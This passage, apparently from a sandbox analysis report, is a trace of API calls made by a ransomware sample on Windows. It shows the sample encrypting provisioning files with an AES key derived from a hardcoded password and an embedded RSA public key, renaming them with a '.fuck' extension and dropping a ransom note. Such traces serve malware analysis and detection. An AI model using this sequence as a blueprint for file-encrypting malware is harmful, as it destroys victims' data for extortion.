"c:\\programdata\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\masterdatastore.xml.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\MasterDatastore.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\masterdatastore.xml"), bFailIfExists=0) returned 0 [0237.673] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\MasterDatastore.xml", dwFileAttributes=0x0) returned 0 [0237.673] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\MasterDatastore.xml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\masterdatastore.xml.gsg")) returned 0 [0237.674] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\MasterDatastore.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\masterdatastore.xml"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\MasterDatastore.xml.fuck" (normalized: "c:\\programdata\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\masterdatastore.xml.fuck")) returned 0 [0237.674] CryptDestroyHash (hHash=0x28463e0) returned 1 [0237.674] CryptDestroyKey (hKey=0x2846460) returned 1 [0237.674] CryptReleaseContext (hProv=0x2844b28, dwFlags=0x0) returned 1 [0237.674] FindNextFileA (in: hFindFile=0x2845de0, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0237.674] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\*.*", lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0x2845ea0 [0237.674] FindNextFileA (in: hFindFile=0x2845ea0, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0237.674] FindNextFileA (in: hFindFile=0x2845ea0, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0237.675] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\RunTime\\*.*", lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 0x28463e0 [0237.675] FindNextFileA (in: hFindFile=0x28463e0, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0237.675] FindNextFileA (in: hFindFile=0x28463e0, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0237.675] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e59c | out: lpSystemTimeAsFileTime=0x2b9e59c) [0237.675] GetLastError () returned 0x5 [0237.675] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\RunTime\\Power_0.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\prov\\runtime\\power_0.provxml")) returned 0x20 [0237.675] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\RunTime\\Power_0.provxml", dwFileAttributes=0x80) returned 0 [0237.676] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\RunTime\\Power_0.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\prov\\runtime\\power_0.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.676] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\RunTime\\Power_0.provxml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\prov\\runtime\\power_0.provxml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.676] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\RunTime\\Power_0.provxml.gsg", dwFileAttributes=0x2) returned 0 [0237.676] CryptAcquireContextA (in: phProv=0x2b9d598, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d598*=0x2844b28) returned 1 [0237.679] CryptCreateHash (in: hProv=0x2844b28, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d59c | out: phHash=0x2b9d59c) returned 1 [0237.679] lstrlenA (lpString="TVpGTgobjlbbFWBWIZZuaMfWzMlQm") returned 29 [0237.679] CryptHashData (hHash=0x2846460, pbData=0x2ec878, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0237.679] CryptDeriveKey (in: hProv=0x2844b28, Algid=0x6610, hBaseData=0x2846460, dwFlags=0x1000000, phKey=0x2b9d588 | out: phKey=0x2b9d588*=0x2846ce0) returned 1 [0237.679] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0237.679] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d5a4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580 | out: pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580) returned 1 [0237.679] CryptAcquireContextA (in: phProv=0x2b9d594, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d594*=0x2858b78) returned 1 [0237.680] CryptImportPublicKeyInfo (in: hCryptProv=0x2858b78, dwCertEncodingType=0x1, pInfo=0x284f808*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x284f838*, PublicKey.cbData=0x8c, PublicKey.pbData=0x284f840*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d58c | out: phKey=0x2b9d58c*=0x28468e0) returned 1 [0237.680] CryptEncrypt (in: hKey=0x28468e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d57c*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d57c*=0x80) returned 1 [0237.680] CryptEncrypt (in: hKey=0x28468e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2858408*, pdwDataLen=0x2b9d590*=0x18, dwBufLen=0x80 | out: pbData=0x2858408*, pdwDataLen=0x2b9d590*=0x80) returned 1 [0237.680] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2858408, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0237.680] ReadFile (in: hFile=0xffffffff, lpBuffer=0x285c980, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x285c980, lpNumberOfBytesRead=0x2b9d5a0*=0x0, lpOverlapped=0x0) returned 0 [0237.680] CryptEncrypt (in: hKey=0x2846ce0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x285c980*, pdwDataLen=0x2b9d5a0*=0x0, dwBufLen=0x400 | out: pbData=0x285c980*, pdwDataLen=0x2b9d5a0*=0x10) returned 1 [0237.680] WriteFile (in: hFile=0xffffffff, lpBuffer=0x285c980, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0237.680] CloseHandle (hObject=0xffffffff) returned 1 [0237.680] CloseHandle (hObject=0xffffffff) returned 1 [0237.681] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\RunTime\\Power_0.provxml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\prov\\runtime\\power_0.provxml.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\RunTime\\Power_0.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\prov\\runtime\\power_0.provxml"), bFailIfExists=0) returned 0 [0237.681] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\RunTime\\Power_0.provxml", dwFileAttributes=0x0) returned 0 [0237.681] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\RunTime\\Power_0.provxml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\prov\\runtime\\power_0.provxml.gsg")) returned 0 [0237.681] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\RunTime\\Power_0.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\prov\\runtime\\power_0.provxml"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\RunTime\\Power_0.provxml.fuck" (normalized: "c:\\programdata\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\prov\\runtime\\power_0.provxml.fuck")) returned 0 [0237.682] CryptDestroyHash (hHash=0x2846460) returned 1 [0237.682] CryptDestroyKey (hKey=0x2846ce0) returned 1 [0237.682] CryptReleaseContext (hProv=0x2844b28, dwFlags=0x0) returned 1 [0237.682] FindNextFileA (in: hFindFile=0x28463e0, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0237.682] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e59c | out: lpSystemTimeAsFileTime=0x2b9e59c) [0237.682] GetLastError () returned 0x5 [0237.682] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\RunTime\\Power_1.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\prov\\runtime\\power_1.provxml")) returned 0x20 [0237.683] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\RunTime\\Power_1.provxml", dwFileAttributes=0x80) returned 0 [0237.683] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\RunTime\\Power_1.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\prov\\runtime\\power_1.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.684] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\RunTime\\Power_1.provxml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\prov\\runtime\\power_1.provxml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.684] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\RunTime\\Power_1.provxml.gsg", dwFileAttributes=0x2) returned 0 [0237.684] CryptAcquireContextA (in: phProv=0x2b9d598, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d598*=0x2858d98) returned 1 [0237.687] CryptCreateHash (in: hProv=0x2858d98, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d59c | out: phHash=0x2b9d59c) returned 1 [0237.687] lstrlenA (lpString="TVpGTgobjlbbFWBWIZZuaMfWzMlQm") returned 29 [0237.687] CryptHashData (hHash=0x2846c20, pbData=0x2ecb70, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0237.687] CryptDeriveKey (in: hProv=0x2858d98, Algid=0x6610, hBaseData=0x2846c20, dwFlags=0x1000000, phKey=0x2b9d588 | out: phKey=0x2b9d588*=0x2846c60) returned 1 [0237.687] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0237.687] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d5a4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580 | out: pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580) returned 1 [0237.687] CryptAcquireContextA (in: phProv=0x2b9d594, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d594*=0x2857fc8) returned 1 [0237.688] CryptImportPublicKeyInfo (in: hCryptProv=0x2857fc8, dwCertEncodingType=0x1, pInfo=0x28505d8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2850608*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2850610*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d58c | out: phKey=0x2b9d58c*=0x28466a0) returned 1 [0237.688] CryptEncrypt (in: hKey=0x28466a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d57c*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d57c*=0x80) returned 1 [0237.688] CryptEncrypt (in: hKey=0x28466a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28588d0*, pdwDataLen=0x2b9d590*=0x18, dwBufLen=0x80 | out: pbData=0x28588d0*, pdwDataLen=0x2b9d590*=0x80) returned 1 [0237.688] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28588d0, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0237.688] ReadFile (in: hFile=0xffffffff, lpBuffer=0x285c980, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x285c980, lpNumberOfBytesRead=0x2b9d5a0*=0x0, lpOverlapped=0x0) returned 0 [0237.688] CryptEncrypt (in: hKey=0x2846c60, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x285c980*, pdwDataLen=0x2b9d5a0*=0x0, dwBufLen=0x400 | out: pbData=0x285c980*, pdwDataLen=0x2b9d5a0*=0x10) returned 1 [0237.688] WriteFile (in: hFile=0xffffffff, lpBuffer=0x285c980, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0237.688] CloseHandle (hObject=0xffffffff) returned 1 [0237.688] CloseHandle (hObject=0xffffffff) returned 1 [0237.688] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\RunTime\\Power_1.provxml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\prov\\runtime\\power_1.provxml.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\RunTime\\Power_1.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\prov\\runtime\\power_1.provxml"), bFailIfExists=0) returned 0 [0237.689] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\RunTime\\Power_1.provxml", dwFileAttributes=0x0) returned 0 [0237.689] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\RunTime\\Power_1.provxml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\prov\\runtime\\power_1.provxml.gsg")) returned 0 [0237.689] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\RunTime\\Power_1.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\prov\\runtime\\power_1.provxml"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\RunTime\\Power_1.provxml.fuck" (normalized: "c:\\programdata\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\prov\\runtime\\power_1.provxml.fuck")) returned 0 [0237.690] CryptDestroyHash (hHash=0x2846c20) returned 1 [0237.690] CryptDestroyKey (hKey=0x2846c60) returned 1 [0237.690] CryptReleaseContext (hProv=0x2858d98, dwFlags=0x0) returned 1 [0237.690] FindNextFileA (in: hFindFile=0x28463e0, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 0 [0237.690] FindClose (in: hFindFile=0x28463e0 | out: hFindFile=0x28463e0) returned 1 [0237.690] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\RunTime\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\prov\\runtime\\readme_back_files.htm")) returned 0xffffffff [0237.690] AreFileApisANSI () returned 1 [0237.690] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28580d8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 113 [0237.690] CreateFileW (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\RunTime\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\prov\\runtime\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e810, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.691] GetLastError () returned 0x5 [0237.691] GetLastError () returned 0x5 [0237.691] FindNextFileA (in: hFindFile=0x2845ea0, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0237.691] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e938 | out: lpSystemTimeAsFileTime=0x2b9e938) [0237.691] GetLastError () returned 0x5 [0237.691] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\RunTime.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\prov\\runtime.xml")) returned 0x20 [0237.691] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\RunTime.xml", dwFileAttributes=0x80) returned 0 [0237.692] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\RunTime.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\prov\\runtime.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.692] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\RunTime.xml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\prov\\runtime.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.692] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\RunTime.xml.gsg", dwFileAttributes=0x2) returned 0 [0237.692] CryptAcquireContextA (in: phProv=0x2b9d934, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d934*=0x2857e30) returned 1 [0237.695] CryptCreateHash (in: hProv=0x2857e30, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d938 | out: phHash=0x2b9d938) returned 1 [0237.695] lstrlenA (lpString="TVpGTgobjlbbFWBWIZZuaMfWzMlQm") returned 29 [0237.695] CryptHashData (hHash=0x28463e0, pbData=0x2ecb70, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0237.695] CryptDeriveKey (in: hProv=0x2857e30, Algid=0x6610, hBaseData=0x28463e0, dwFlags=0x1000000, phKey=0x2b9d924 | out: phKey=0x2b9d924*=0x2846660) returned 1 [0237.695] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0237.695] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d940, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c | out: pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c) returned 1 [0237.695] CryptAcquireContextA (in: phProv=0x2b9d930, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d930*=0x2858050) returned 1 [0237.696] CryptImportPublicKeyInfo (in: hCryptProv=0x2858050, dwCertEncodingType=0x1, pInfo=0x28506a8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x28506d8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x28506e0*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d928 | out: phKey=0x2b9d928*=0x2846a20) returned 1 [0237.696] CryptEncrypt (in: hKey=0x2846a20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d918*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d918*=0x80) returned 1 [0237.696] CryptEncrypt (in: hKey=0x2846a20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2858a68*, pdwDataLen=0x2b9d92c*=0x18, dwBufLen=0x80 | out: pbData=0x2858a68*, pdwDataLen=0x2b9d92c*=0x80) returned 1 [0237.696] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2858a68, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0237.696] ReadFile (in: hFile=0xffffffff, lpBuffer=0x285c980, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d93c, lpOverlapped=0x0 | out: lpBuffer=0x285c980, lpNumberOfBytesRead=0x2b9d93c*=0x0, lpOverlapped=0x0) returned 0 [0237.696] CryptEncrypt (in: hKey=0x2846660, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x285c980*, pdwDataLen=0x2b9d93c*=0x0, dwBufLen=0x400 | out: pbData=0x285c980*, pdwDataLen=0x2b9d93c*=0x10) returned 1 [0237.696] WriteFile (in: hFile=0xffffffff, lpBuffer=0x285c980, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0237.696] CloseHandle (hObject=0xffffffff) returned 1 [0237.696] CloseHandle (hObject=0xffffffff) returned 1 [0237.696] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\RunTime.xml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\prov\\runtime.xml.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\RunTime.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\prov\\runtime.xml"), bFailIfExists=0) returned 0 [0237.697] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\RunTime.xml", dwFileAttributes=0x0) returned 0 [0237.697] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\RunTime.xml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\prov\\runtime.xml.gsg")) returned 0 [0237.697] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\RunTime.xml" 